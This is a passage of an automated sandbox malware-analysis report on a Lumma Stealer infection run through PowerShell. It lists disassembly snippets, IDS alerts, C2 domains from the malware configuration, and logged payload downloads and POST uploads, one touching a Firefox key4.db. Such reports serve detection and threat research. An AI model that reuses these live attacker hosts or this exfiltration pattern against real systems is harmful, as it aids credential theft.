                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp eax10_2_00429A8C
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+37657BB2h]10_2_00429AA2
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h10_2_004262BB
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h10_2_004262BB
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h10_2_00418345
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp al, 2Eh10_2_00427B1D
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, eax10_2_00427B1D
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp eax10_2_004283E2
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h10_2_00418BED
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp ecx10_2_0043FBEC
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx10_2_00421BF0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov eax, ebx10_2_0041CBA0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 75827ABFh10_2_00416C59
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp ecx10_2_0043FC25
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp eax10_2_0042A428
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov eax, dword ptr [00446244h]10_2_0042543E
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h10_2_0043D4C0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-493EE972h]10_2_0042F4D9
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, ecx10_2_0042D4B4
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+16h]10_2_0042E556
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [esi], cl10_2_0042E556
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+1Ch]10_2_0042E556
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]10_2_0041ED60
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-493EE972h]10_2_0042F56D
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, ebx10_2_0043D530
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edi, word ptr [ecx]10_2_0043FDC0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edi+132E2CF3h]10_2_0043FDC0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, word ptr [ecx]10_2_00440DF0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]10_2_0042ADA0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, edi10_2_00409650
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ebx], ax10_2_00409650
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx-4Bh]10_2_0043F625
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ebx], ax10_2_00419E30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]10_2_0043DE30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp eax10_2_00428637
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp eax10_2_004296EE
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then test esi, esi10_2_0043AEF0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+edi-000000F6h]10_2_00408E90
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-53h]10_2_00417F57
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [esi], bl10_2_0042E76A
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp ecx10_2_0040A776
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-7D4318DCh]10_2_00421700
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edi+132E2CF3h]10_2_0043FF20
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp eax10_2_0043EFE1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-3C167E04h]10_2_0040CF99
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-3C167E04h]10_2_0040CF99
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax10_2_00426FA0

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:57635 -> 104.21.64.1:443
                              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:57621 -> 104.21.64.1:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:57621 -> 104.21.64.1:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:57694 -> 104.21.64.1:443
                              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:57628 -> 104.21.64.1:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:57628 -> 104.21.64.1:443
                              C2 URLs / IPs found in malware configuration
                              Source: Malware configuration extractorURLs: immolatechallen.bond
                              Source: Malware configuration extractorURLs: growthselec.bond
                              Source: Malware configuration extractorURLs: idealizetreez.shop
                              Source: Malware configuration extractorURLs: jarry-fixxer.bond
                              Source: Malware configuration extractorURLs: jarry-deatile.bond
                              Source: Malware configuration extractorURLs: crookedfoshe.bond
                              Source: Malware configuration extractorURLs: pain-temper.bond
                              Source: Malware configuration extractorURLs: stripedre-lot.bond
                              Source: Malware configuration extractorURLs: strivehelpeu.bond
                              Creates HTML files with .exe extension (expired dropper behavior)
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: UAGVQ199I7H3ZT4G1PSFXCX6W.exe.10.dr
                              Source: global trafficTCP traffic: 192.168.2.6:57513 -> 1.1.1.1:53
                              Source: global trafficHTTP traffic detected: GET /5c85i3vbf.vdf HTTP/1.1Host: e1.foiloverturnarrival.shopConnection: Keep-Alive
                              Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                              Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:57621 -> 104.21.64.1:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:57628 -> 104.21.64.1:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:57635 -> 104.21.64.1:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:57654 -> 104.21.64.1:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:57644 -> 104.21.64.1:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:57675 -> 104.21.64.1:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:57694 -> 104.21.64.1:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:57662 -> 104.21.64.1:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:57702 -> 172.67.212.45:443
                              Source: global trafficHTTP traffic detected: GET /riiw1.mp3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: f1.foiloverturnarrival.shopConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: idealizetreez.shop
                              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 46Host: idealizetreez.shop
                              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7R1X44YR9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12804Host: idealizetreez.shop
                              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QEDRH3K2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15044Host: idealizetreez.shop
                              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KC1NO31LQLQP67DILUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19956Host: idealizetreez.shop
                              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QVZ0U5BFV3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1340Host: idealizetreez.shop
                              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PZ2UVVEOHBJJFZMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 587475Host: idealizetreez.shop
                              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 81Host: idealizetreez.shop
                              Source: global trafficHTTP traffic detected: GET /int_clp_8888.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipgibob.shop
                              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficHTTP traffic detected: GET /5c85i3vbf.vdf HTTP/1.1Host: e1.foiloverturnarrival.shopConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /riiw1.mp3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: f1.foiloverturnarrival.shopConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /int_clp_8888.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipgibob.shop
                              Source: global trafficDNS traffic detected: DNS query: e1.foiloverturnarrival.shop
                              Source: global trafficDNS traffic detected: DNS query: f1.foiloverturnarrival.shop
                              Source: global trafficDNS traffic detected: DNS query: idealizetreez.shop
                              Source: global trafficDNS traffic detected: DNS query: klipgibob.shop
                              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: idealizetreez.shop
                              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 15 Jan 2025 17:25:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9gzl5x1vpf3rLPmKG21%2BjRwQsi2eUqbYUQxJepG4nv7QK6JEwRzeXFK6ccoomV%2FPU46Ab4k8v2vpQCHxgGxTO%2FPrAPYXB7gysTbiDnNhDAdehSLCHGmmVzioTc%2F1H0pIMQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9027913d6d6eaac5-YYZalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=13780&min_rtt=13779&rtt_var=5171&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2865&recv_bytes=819&delivery_rate=211686&cwnd=32&unsent_bytes=0&cid=3c144a9a0b8205bb&ts=239&x=0"
                              Source: powershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                              Source: powershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                              Source: powershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                              Source: powershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                              Source: powershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                              Source: powershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                              Source: powershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                              Source: powershell.exe, 00000002.00000002.2169498236.0000000006467000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2473160112.00000000060E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                              Source: powershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                              Source: powershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                              Source: powershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                              Source: powershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                              Source: powershell.exe, 00000004.00000002.2473160112.00000000051D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                              Source: powershell.exe, 00000002.00000002.2166214254.0000000005401000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2473160112.0000000005081000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: powershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                              Source: powershell.exe, 00000004.00000002.2473160112.00000000051D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                              Source: powershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://www.red-gate.com/products/dotnet-development/smartassembly/?utm_source=smartassemblyui&utm_me
                              Source: powershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://www.smartassembly.com/webservices/Reporting/
                              Source: powershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://www.smartassembly.com/webservices/Reporting/UploadReport2
                              Source: powershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://www.smartassembly.com/webservices/Reporting/UploadReport2v
                              Source: powershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://www.smartassembly.com/webservices/UploadReportLogin/
                              Source: powershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://www.smartassembly.com/webservices/UploadReportLogin/GetServerURL
                              Source: powershell.exe, 00000002.00000002.2166214254.0000000005401000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2473160112.0000000005081000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                              Source: powershell.exe, 00000004.00000002.2473160112.00000000060E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                              Source: powershell.exe, 00000004.00000002.2473160112.00000000060E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                              Source: powershell.exe, 00000004.00000002.2473160112.00000000060E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                              Source: powershell.exe, 0000000A.00000002.2611019468.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2614706599.0000000004E6D000.00000004.00000800.00020000.00000000.sdmp, UAGVQ199I7H3ZT4G1PSFXCX6W.exe.10.drString found in binary or memory: https://developers.cloudflare.com/r2/data-access/public-buckets/
                              Source: powershell.exe, 00000002.00000002.2170945557.0000000007A9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://e1.foilovM
                              Source: powershell.exe, 00000002.00000002.2170945557.0000000007A9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://e1.foilovMicrosoft.PowerShell.Utility.psd1
                              Source: powershell.exe, 00000004.00000002.2473160112.00000000051D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e1.foiloverturnarrival.shop
                              Source: powershell.exe, 00000004.00000002.2511388089.0000000007770000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf
                              Source: powershell.exe, 00000004.00000002.2473160112.00000000051D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                              Source: powershell.exe, 00000004.00000002.2735376513.000000000CB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2735376513.000000000CB61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                              Source: powershell.exe, 00000004.00000002.2735376513.000000000CB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2735376513.000000000CB61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                              Source: powershell.exe, 00000004.00000002.2735376513.000000000CB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2735376513.000000000CB61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                              Source: powershell.exe, 0000000A.00000002.2615620386.0000000004EF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://idealizetreez.shop/
                              Source: powershell.exe, 0000000A.00000002.2614421202.0000000004E60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://idealizetreez.shop/&
                              Source: powershell.exe, 0000000A.00000002.2612459672.0000000002A3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://idealizetreez.shop/api
                              Source: powershell.exe, 0000000A.00000002.2612459672.0000000002A3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://idealizetreez.shop/apiP
                              Source: powershell.exe, 0000000A.00000002.2615868252.0000000004F0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://idealizetreez.shop:443/api
                              Source: powershell.exe, 0000000A.00000002.2615868252.0000000004F0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://idealizetreez.shop:443/api.default-release/key4.dbPK
                              Source: powershell.exe, 0000000A.00000002.2612459672.0000000002A3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipgibob.shop/
                              Source: powershell.exe, 0000000A.00000002.2612459672.0000000002A3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipgibob.shop/R
                              Source: powershell.exe, 0000000A.00000002.2612459672.0000000002A3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipgibob.shop/d
                              Source: powershell.exe, 0000000A.00000002.2612459672.0000000002A3B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2611019468.00000000029DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipgibob.shop/int_clp_8888.txt
                              Source: powershell.exe, 0000000A.00000002.2615868252.0000000004F0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://klipgibob.shop:443/int_clp_8888.txtt
                              Source: powershell.exe, 00000002.00000002.2169498236.0000000006467000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2473160112.00000000060E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                              Source: powershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                              Source: powershell.exe, 00000004.00000002.2735376513.000000000CB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2735376513.000000000CB61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                              Source: powershell.exe, 00000004.00000002.2735376513.000000000CB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2735376513.000000000CB61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                              Source: powershell.exe, 00000004.00000002.2735376513.000000000CB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2735376513.000000000CB61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                              Source: powershell.exe, 0000000A.00000002.2612459672.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2612459672.0000000002A3B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2611019468.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2614706599.0000000004E6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2612459672.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2615868252.0000000004F0F000.00000004.00000800.00020000.00000000.sdmp, UAGVQ199I7H3ZT4G1PSFXCX6W.exe.10.drString found in binary or memory: https://www.cloudflare.com/favicon.ico
                              Source: powershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                              Source: unknownNetwork traffic detected: HTTP traffic on port 57662 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57702
                              Source: unknownNetwork traffic detected: HTTP traffic on port 57600 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57628
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57621
                              Source: unknownNetwork traffic detected: HTTP traffic on port 57628 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57654
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57600
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57644
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57635
                              Source: unknownNetwork traffic detected: HTTP traffic on port 57644 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57694
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57662
                              Source: unknownNetwork traffic detected: HTTP traffic on port 57621 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 57694 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57675
                              Source: unknownNetwork traffic detected: HTTP traffic on port 57702 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 57675 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                              Source: unknownNetwork traffic detected: HTTP traffic on port 57654 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 57635 -> 443
                              Source: unknownHTTPS traffic detected: 172.67.194.161:443 -> 192.168.2.6:49715 version: TLS 1.2
